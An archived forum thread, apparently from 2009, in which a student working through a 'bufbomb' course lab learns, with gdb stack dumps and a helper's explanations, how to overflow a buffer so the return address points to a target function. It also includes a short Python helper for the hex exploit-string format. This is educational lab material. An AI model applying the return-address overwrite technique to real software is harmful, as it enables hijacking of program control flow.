Assuming I am correct, I still do not understand how I would determine the string I would have to enter to cause the overflow to reach where the return address is stored and replace it with smoke()'s address. I know it needs to be x amount of bytes, but how would I determine that? I figured out I can get byte information using the x/4b address command, but I'm not sure what to do with it to get the answer... help? lol

(gdb) run -t jalexanb < exploit-raw.txt
Starting program: /home/jalexanb/lab2/bufbomb -t jalexanb < exploit-raw.txt
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Team: jalexanb
Cookie: 0x5d5f53de 
Breakpoint 1, 0x08048f79 in test ()
(gdb) backtrace
#0  0x08048f79 in test ()
#1  0x08049056 in launch ()
#2  0x080492b1 in main ()
(gdb) info frame
Stack level 0, frame at 0xbfffb430:
 eip = 0x8048f79 in test; saved eip 0x8049056
 called by frame at 0xbfffea00
 Arglist at 0xbfffb428, args: 
 Locals at 0xbfffb428, Previous frame's sp is 0xbfffb430
 Saved registers:
  ebp at 0xbfffb428, eip at 0xbfffb42c
(gdb) x/4xw 0x08048f79
0x8048f79 <test+25>:    0xffffc2e8      0x8bc289ff      0xef3dfc45      0x74deadbe
(gdb) si
0x08048f40 in getbuf ()
(gdb) backtrace full
#0  0x08048f40 in getbuf ()
No symbol table info available.
#1  0x08048f7e in test ()
No symbol table info available.
#2  0x08049056 in launch ()
No symbol table info available.
#3  0x080492b1 in main ()
No symbol table info available.
(gdb) backtrace
#0  0x08048f40 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) frame 0
#0  0x08048f40 in getbuf ()
(gdb) frame 4
#0  0x00000000 in ?? ()
(gdb) x/4xw 0x08048f40
0x8048f40 <getbuf>:     0x83e58955      0x458d18ec      0x240489f4      0xfffe7fe8
(gdb) info frame
Stack level 0, frame at 0x4:
 eip = 0x0; saved eip 0x8048f7e
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  eip at 0xbfffb40c
(gdb) info frame 1
Stack frame at 0xbfffb430:
 eip = 0x8048f7e in test; saved eip 0x8049056
 called by frame at 0xbfffea00, caller of frame at 0xbfffb410
 Arglist at 0xbfffb428, args: 
 Locals at 0xbfffb428, Previous frame's sp is 0xbfffb430
 Saved registers:
  ebp at 0xbfffb428, eip at 0xbfffb42c
(gdb) info frame 0
Stack frame at 0xbfffb410:
 eip = 0x8048f40 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  eip at 0xbfffb40c
(gdb) si
0x08048f41 in getbuf ()
(gdb) backtrace
#0  0x08048f41 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f41 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) frame 0
#0  0x08048f41 in getbuf ()
(gdb) x/4xw 0x08048f41
0x8048f41 <getbuf+1>:   0xec83e589      0xf4458d18      0xe8240489      0xfffffe7f
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f41 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) si
0x08048f43 in getbuf ()
(gdb) backtrace
#0  0x08048f43 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f43 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) x/4b 0xbfffb410
0xbfffb410:     0x03    0x00    0x00    0x00
(gdb) si
0x08048f46 in getbuf ()
(gdb) backtrace
#0  0x08048f46 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f46 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) si
0x08048f49 in getbuf ()
(gdb) c
Continuing. 
Breakpoint 2, 0x08048f51 in getbuf ()
(gdb) backtrace
#0  0x08048f51 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f51 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) x/4xw 0xbfffb410
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
(gdb) x/4b 0xbffb410
0xbffb410:      Cannot access memory at address 0xbffb410
(gdb) x/4b 0xbfffb410
0xbfffb410:     0x03    0x00    0x00    0x00
(gdb) si
0x08048f56 in getbuf ()
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f56 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) backtrace
#0  0x08048f56 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) x/4b 0x08048f56
0x8048f56 <getbuf+22>:  0xc9    0xc3    0x90    0x8d
(gdb) si
0x08048960 in alarmhandler ()
(gdb) c
Continuing.
Type string:Dead!: getbuf didn't complete within 600 seconds
Better luck next time 
Program exited normally.
(gdb) Quit
(gdb)
Breakpoint 1, 0x08048f79 in test ()
(gdb) c
Continuing. 
Breakpoint 2, 0x08048f51 in getbuf ()
(gdb) backtrace
#0  0x08048f51 in getbuf ()
#1  0x08048f7e in test ()
#2  0x08049056 in launch ()
#3  0x080492b1 in main ()
(gdb) info frame 0
Stack frame at 0xbfffb410:
 eip = 0x8048f51 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f51 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) x/4b 0xbfffb408
0xbfffb408:     0x28    0xb4    0xff    0xbf
(gdb) si
0x08048f56 in getbuf ()
(gdb) info frame
Stack level 0, frame at 0xbfffb410:
 eip = 0x8048f56 in getbuf; saved eip 0x8048f7e
 called by frame at 0xbfffb430
 Arglist at 0xbfffb408, args: 
 Locals at 0xbfffb408, Previous frame's sp is 0xbfffb410
 Saved registers:
  ebp at 0xbfffb408, eip at 0xbfffb40c
(gdb) x/4b 0xbfffb410
0xbfffb410:     0x03    0x00    0x00    0x00
(gdb) si
0x08048f57 in getbuf ()
(gdb) backtrace
#0  0x08048f57 in getbuf ()
#1  0x08049056 in launch ()
#2  0x080492b1 in main ()
(gdb) info frame
Stack level 0, frame at 0xbfffb430:
 eip = 0x8048f57 in getbuf; saved eip 0x8049056
 called by frame at 0xbfffea00
 Arglist at 0xbfffb428, args: 
 Locals at 0xbfffb428, Previous frame's sp is 0xbfffb430
 Saved registers:
  ebp at 0xbfffb428, eip at 0xbfffb42c
(gdb) frame 0
#0  0x08048f57 in getbuf ()
(gdb) x/4b 0xbfffb428
0xbfffb428:     0xf8    0xe9    0xff    0xbf
(gdb) x/4b 0xbfffb42c
0xbfffb42c:     0x56    0x90    0x04    0x08
(gdb) si
0x08048f7e in test ()
(gdb) 
                                              

 

by: Infinity08 | Posted on 2009-11-02 at 23:23:51 | ID: 25726651

>> >>Locals at 0xbfffb428
>> Local variables stored here?

Yes, they are inside the stack frame.

>> >> Saved registers:
>>  >> ebp at 0xbfffb428, eip at 0xbfffb42c
>> Return address is ebp?

ebp is the base pointer. This saved value points to the previous stack frame.

The return address is pushed on the stack by the 'call' instruction. With gdb, you can see what happens when stepping over that instruction.

>> I know it needs to be x amount of bytes but how would I determine that?

By looking on the stack, how far your buffer is from the return address.

 

by: purewin | Posted on 2009-11-02 at 23:54:37 | ID: 25726785

So looking from the call to getbuf from test would tell me where on the stack return is initially located? Is return stored as a register or memory address on the stack? I'm not sure what return would look like on the stack or what it would be under when I use info frame. I know where conceptually it is on the stack from your link http://en.wikipedia.org/wiki/Call_stack#Structure but I'm not sure about finding it in practice.

 

by: Infinity08 | Posted on 2009-11-03 at 00:57:32 | ID: 25727087

>> So looking from the call to getbuf from test would tell me where on the stack return is initially located?

If you run the code in gdb, and look at the difference of the stack contents before and after the call getbuf instruction, you'll see where the return address is saved, and what it is.


>> Is return stored as a register or memory address on the stack?

You can't store a register on the stack, only values. What you're looking for is an address.


>> I'm not sure what return would look like on the stack or what it would be under when I use info frame.

Don't use info frame - use the x command instead to show the complete and precise contents of the stack.

 

by: purewin | Posted on 2009-11-03 at 01:09:58 | ID: 25727139

I must not be utilizing the x command in the correct way then. Should I not be using it like this?

x/4b address
or
x/4xw address

Depending on which I use I get 4 byte numbers or what looks like 4 hexadecimal addresses. Neither of which look to me like the stack. Is using the x command only going to show me part of the stack? Or should I be able to see the entire stack using it?

 

by: purewin | Posted on 2009-11-03 at 01:17:50 | ID: 25727175

Okay maybe this will help if you can explain what I'm looking at when I use this command and given this example:

(gdb) x/4xw 0x08048f79
0x8048f79 <test+25>:    0xffffc2e8      0x8bc289ff      0xef3dfc45      0x74deadbe

What exactly am I looking at here? It looks like the 4th one has had an overflow of what contained dead beef. Other than that I don't get what I'm looking at.

 

by: purewin | Posted on 2009-11-03 at 01:38:21 | ID: 25727272

Do I need to use the
x/b4 address
command at every line where something is changed and then use those values to overflow the smoke() address to where it's needed?

 

by: Infinity08 | Posted on 2009-11-03 at 02:41:37 | ID: 25727583

>> Neither of which look to me like the stack.

What should the stack look like then ?

The stack is just a region in memory that contains data. You can display the contents of the stack by displaying those data values from that region of memory.


>> Is using the x command only going to show me part of the stack?

The x command is used to examine the value at a certain memory address. If you use a memory address that is inside the stack, then you'll show a value that is on the stack.


>> (gdb) x/4xw 0x08048f79
>> 0x8048f79 <test+25>:    0xffffc2e8      0x8bc289ff      0xef3dfc45      0x74deadbe

First of all, get aligned 32-bit values, i.e. use addresses that are a multiple of 4 (0x08048f8 e.g.).

Second, use an address that is inside the stack (like the stack pointer for example). You'll start seeing some familiar values.

 

by: purewin | Posted on 2009-11-03 at 02:48:12 | ID: 25727613

How do I know if it's on the stack then? The address, that is. I feel like my problem is not being able to recognize the stack and the stuff in it when I see it. I understand what it looks like in diagrams and figures and whatnot, but translating that into what it looks like through code/debugger or whatever isn't clicking. Do you have any examples or something? I just need some kind of idea of what what I'm looking for looks like.

 

by: Infinity08 | Posted on 2009-11-03 at 03:23:33 | ID: 25727796

>> How do I know if it's on the stack then? The address that is.

As I said (http:#25709275 for example) : use the stack pointer (esp).

        x/4xw $sp

for example shows the 4 32bit values at the top of the stack.

 

by: purewin | Posted on 2009-11-03 at 03:44:09 | ID: 25727936

Okay, I THINK I've got at least the location to which I need to overflow. Is the location of 0xdeadbeef where I need to insert the address for smoke?

(gdb) x/32xw $sp
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb47c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb)

Breakpoint 3, 0x08048f79 in test ()
(gdb) x/4xw $sp
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
(gdb) info frame
Stack level 0, frame at 0xbfffb430:
 eip = 0x8048f79 in test; saved eip 0x8049056
 called by frame at 0xbfffea00
 Arglist at 0xbfffb428, args: 
 Locals at 0xbfffb428, Previous frame's sp is 0xbfffb430
 Saved registers:
  ebp at 0xbfffb428, eip at 0xbfffb42c
(gdb) x/8xw $sp
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
(gdb) x/32xw $sp
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb470:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb480:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048f40 in getbuf ()
(gdb) x/32xw $sp
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb47c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048f41 in getbuf ()
(gdb) x/32xw $sp
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb468:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb478:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) c
Continuing. 
Breakpoint 4, 0x08048f51 in getbuf ()
(gdb) x/32xw $sp
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0x04084002
0xbfffb400:     0x0000908d      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048f56 in getbuf ()
(gdb) si
0x08048f57 in getbuf ()
(gdb) x/32xw $sp
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb47c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) 
                                              

 

by: purewin | Posted on 2009-11-03 at 04:33:22 | ID: 25728260

Does the text I attached make sense to you? What exactly do I need to pass as input? Bytes? A regular string?

Your exploit strings will typically contain byte values that do not correspond to the ASCII values for printing characters. The program sendstring can help you generate these raw strings. It takes as input a hex-formatted string. In this format, each byte value is represented by two hex digits. For example, the string 012345 could be entered in hex format as 30 31 32 33 34 35. (Recall that the ASCII code for decimal digit x is 0x3x.) Non-hex digit characters are ignored, including the blanks in the example shown.

                                              

 

by: purewin | Posted on 2009-11-03 at 04:34:17 | ID: 25728273

EDIT: I don't know what happened to the text I just posted here it is again.

Your exploit strings will typically contain byte values that do not correspond to the ASCII values for printing characters. The program sendstring can help you generate these raw strings. It takes as input a hex-formatted string. In this format, each byte value is represented by two hex digits. For example, the string 012345 could be entered in hex format as 30 31 32 33 34 35. (Recall that the ASCII code for decimal digit x is 0x3x.) Non-hex digit characters are ignored, including the blanks in the example shown.
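Two things in the lab text above and in the earlier dumps are easy to misread by eye: the sendstring format ignores every non-hex character, and a 32-bit word that `x/xw` shows as 0x08049056 sits in memory as the byte sequence 56 90 04 08 that `x/4b` showed at 0xbfffb42c earlier in the thread (x86 is little-endian). The Python below is an added example, not part of the thread or of the lab's sendstring program; it decodes the hex format with the same ignore-non-hex rule, refuses an odd number of digits instead of silently dropping one, and converts between the two gdb views of a word. All function names are mine.

```python
import re
import struct


def decode_hex_format(text):
    """Decode the hex format sendstring accepts: two hex digits per byte,
    every other character (blanks, newlines, punctuation) ignored."""
    digits = re.sub(r"[^0-9a-fA-F]", "", text)
    if len(digits) % 2 != 0:
        # a stray single digit would shift every later byte by a nibble,
        # so refuse rather than guess which byte was meant
        raise ValueError("hex-formatted string has an odd number of digits")
    return bytes.fromhex(digits)


def encode_hex_format(data):
    """Inverse of decode_hex_format: space-separated two-digit hex bytes."""
    return " ".join("%02x" % b for b in data)


def word_to_bytes(word):
    """The 4 bytes `x/4b` shows for the word `x/xw` shows (little-endian)."""
    return struct.pack("<I", word)


def bytes_to_word(raw):
    """The word `x/xw` shows for the 4 bytes `x/4b` shows at the same address."""
    if len(raw) != 4:
        raise ValueError("need exactly 4 bytes")
    return struct.unpack("<I", raw)[0]


def describe_bytes(data):
    """Pair each byte with its printable ASCII character, or None when it has
    none; this is why raw exploit strings cannot simply be typed at a prompt."""
    return [(b, chr(b) if 0x20 <= b < 0x7f else None) for b in data]


if __name__ == "__main__":
    # sample inputs taken from the lab text and the x/4b output in this thread
    print(decode_hex_format("30 31 32 33 34 35"))               # b'012345'
    print(encode_hex_format(word_to_bytes(0x08049056)))          # 56 90 04 08
    print(hex(bytes_to_word(bytes([0x28, 0xb4, 0xff, 0xbf]))))   # 0xbfffb428
    print(describe_bytes(word_to_bytes(0x08049056)))
```

The `x/4b` view is what the file fed to `run ... < exploit-raw.txt` actually contains, byte by byte; the `x/xw` view is the same memory read back as one number, which is why the digits appear reversed between the two listings.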

 

by: purewin | Posted on 2009-11-03 at 04:58:26 | ID: 25728432

Never mind about deadbeef being the return address. The first thing pushed onto the stack once a function is called is the return address, correct? If so then:

Breakpoint 1, 0x08048f79 in test ()
(gdb) x/32xw $sp
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000

is what the stack looks like before the call to getbuf and

0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000

is what the stack looks like once getbuf is entered and the first thing to change is a push of 0x08048f7e onto the top of the stack which should be the return address! Right? Hope so. If it is where do I go from here....

 

by: Infinity08 | Posted on 2009-11-03 at 05:04:50 | ID: 25728484

>> Is the locatin of 0xdeadbeef where I need to insert the address for smoke?

You'll notice that 0xdeadbeef is a local variable in the test function.


If you look at the start of the test function, you see :

>> 0x08048f60 <test+0>:    push   %ebp

the previous base pointer (ebp) is pushed onto the stack.

>> 0x08048f61 <test+1>:    mov    %esp,%ebp

Doesn't impact the stack.

>> 0x08048f63 <test+3>:    sub    $0x18,%esp

adds room for 6 local 32bit values onto the stack.

>> 0x08048f66 <test+6>:    movl   $0xdeadbeef,0xfffffffc(%ebp)

places the value 0xdeadbeef in the first one of those 6 32bit values.

So, you should have this on the stack (stack growing up) :

        local variable : ???
        local variable : ???
        local variable : ???
        local variable : ???
        local variable : ???
        local variable : 0xdeadbeef
        saved ebp
        return address
        ...

Can you see what's what now ?

 

by: Infinity08 | Posted on 2009-11-03 at 05:07:43 | ID: 25728512

>> Never mind about deadbeef being the return address. The first thing pushed onto the stack once a function is called is the return address, correct?

That's right. The moment of the call instruction, the return address is pushed on the stack, and then the instructions of the function are executed one by one.


>> is what the stack looks like once getbuf is entered and the first thing to change is a push of 0x08048f7e onto the top of the stack which should be the return address! Right?

That's correct. You'll notice that 0x08048f7e is the address of the instruction right after the call getbuf instruction :

>> 0x08048f79 <test+25>:   call   0x8048f40 <getbuf>
>> 0x08048f7e <test+30>:   mov    %eax,%edx


>> If it is where do I go from here....

Now, you have to find where the buffer is placed on the stack. Once you have its location, you know how far you have to overflow the buffer to overwrite the return address.

 

by: purewin | Posted on 2009-11-03 at 05:12:12 | ID: 25728545

And to find where the buffer is at, I should step through the code to the return in getbuf?

 

by: Infinity08 | Posted on 2009-11-03 at 05:18:08 | ID: 25728590

>> And to find where the buffer is at, I should step through the code to the return in getbuf?

You should step through the code to where the buffer is used.

getbuf calls Gets internally, which takes a string as input from the user, and places it at the address 0xfffffff4(%ebp), since that's what's being passed as parameter to Gets.

 

by: Infinity08 | Posted on 2009-11-03 at 05:18:51 | ID: 25728595

Basically, simply step through the code in the debugger, until you're asked to enter a string, enter a string, and see where it ends up on the stack ...

 

by: purewin | Posted on 2009-11-03 at 05:28:59 | ID: 25728667

Do I simply type the memory address for smoke() to call it?

 

by: purewin | Posted on 2009-11-03 at 05:37:54 | ID: 25728748

Okay so the string I entered was test and here is what I have. It seems the string was entered after 0x0804a108 and I need smoke() to be at 0x08048f7e. How do I determine what I need to enter from this? Do I need to convert the four addresses to bytes and pass the bytes as the string?

(gdb) x/32xw $sp
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) c
Continuing.
Type string:test

Breakpoint 2, 0x08048f51 in getbuf ()
(gdb) x/32xw $sp
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0x74736574
0xbfffb400:     0x00857f00      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb)

 

by: Infinity08 | Posted on 2009-11-03 at 05:40:32 | ID: 25728771

>> Do I simply type the memory address for smoke() to call it?

If you overwrite the return address with the address of the first instruction in the smoke function, then as soon as the getbuf function ends, it will go to the (now overwritten) return address, and start executing there.

 

by: Infinity08 | Posted on 2009-11-03 at 05:43:13 | ID: 25728798

>> It seems the string was entered after 0x0804a108

Right. 0x74736574 0x00 is the "test" string.

>> Do I need to convert the four addresses to bytes and pass the bytes as the string?

Yes, you need to pass a string that has the desired new return address at the right location.

 

by: purewin | Posted on 2009-11-03 at 05:55:19 | ID: 25728904

Sooo, would these 0x74736574 0x00857f00 0x00000003 0xbfffb428 mean I would need a string of 8 bytes followed by the byte equivalent of the smoke() address?

 

by: Infinity08 | Posted on 2009-11-03 at 05:57:36 | ID: 25728927

>> mean I would need a string of 8 bytes followed by the byte equivalent of the smoke() address?

12 bytes, but yes, that's the idea.

 

by: purewin | Posted on 2009-11-03 at 06:03:37 | ID: 25728985

So as long as it's 12 bytes and then the address, can it be any string to make up the 12 bytes?

 

by: Infinity08 | Posted on 2009-11-03 at 06:12:25 | ID: 25729070

12 bytes of whatever data you need, to overwrite the 0x74736574 0x00857f00 0x00000003.
Then 4 bytes that contain the desired new return address.
For a total of 16 bytes.

 

by: purewin | Posted on 2009-11-03 at 06:14:46 | ID: 25729094

I tried to pass "0xbfffb434 0x00857ff4 0x00000003 0xbfffb428 0x08048d90" as the string but I got a segmentation fault. The far right address is the address for smoke().

 

by: Infinity08 | Posted on 2009-11-03 at 06:17:37 | ID: 25729120

No, you need to pass one character per byte. So, a total of 16 characters. The last 4 characters will represent the 4 bytes of the new return address (check the extended ASCII set to know which characters you need).

 

by: purewin | Posted on 2009-11-03 at 06:23:54 | ID: 25729182

Okay, I tried the x/32b command to get the numbers to match against the chart, but I have a couple of extra lines... what are they used for?

(gdb) x/32b $sp
0xbfffb3f0:     0xfc    0xb3    0xff    0xbf    0x00    0x00    0x00    0x00
0xbfffb3f8:     0x08    0xa1    0x04    0x08    0x34    0xb4    0xff    0xbf
0xbfffb400:     0xf4    0x7f    0x85    0x00    0x03    0x00    0x00    0x00
0xbfffb408:     0x28    0xb4    0xff    0xbf    0x7e    0x8f    0x04    0x08
(gdb)

 

by: purewin | Posted on 2009-11-03 at 06:45:51 | ID: 25729395

Never mind about the extra lines, I figured that out. Just trying to figure out how to read the numbers to make sure they're in order...

 

by: purewin | Posted on 2009-11-03 at 06:47:16 | ID: 25729414

Do you read them across? And then read the next line and so on? Kind of confused on how to change them into a single line...

 

by: Infinity08 | Posted on 2009-11-03 at 07:23:38 | ID: 25729782

0xbfffb434 is a 32-bit value, shown in hexadecimal.
If you show that same value as 4 8-bit bytes (again in hexadecimal), you get: 0xbf 0xff 0xb4 0x34

It's the same value, just presented differently.

 

by: purewin | Posted on 2009-11-03 at 09:51:51 | ID: 25731551

I have everything replaced exactly, but I'm still getting a segmentation fault even though everything matches up...

Breakpoint 1, 0x08048f79 in test ()
(gdb) c
Continuing. 
Breakpoint 2, 0x08048f4c in getbuf ()
(gdb) x/32xw $sp
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32b $sp
0xbfffb3f0:     0xfc    0xb3    0xff    0xbf    0x00    0x00    0x00    0x00
0xbfffb3f8:     0x08    0xa1    0x04    0x08    0x34    0xb4    0xff    0xbf
0xbfffb400:     0xf4    0x7f    0x85    0x00    0x03    0x00    0x00    0x00
0xbfffb408:     0x28    0xb4    0xff    0xbf    0x7e    0x8f    0x04    0x08
(gdb) c
Continuing. 
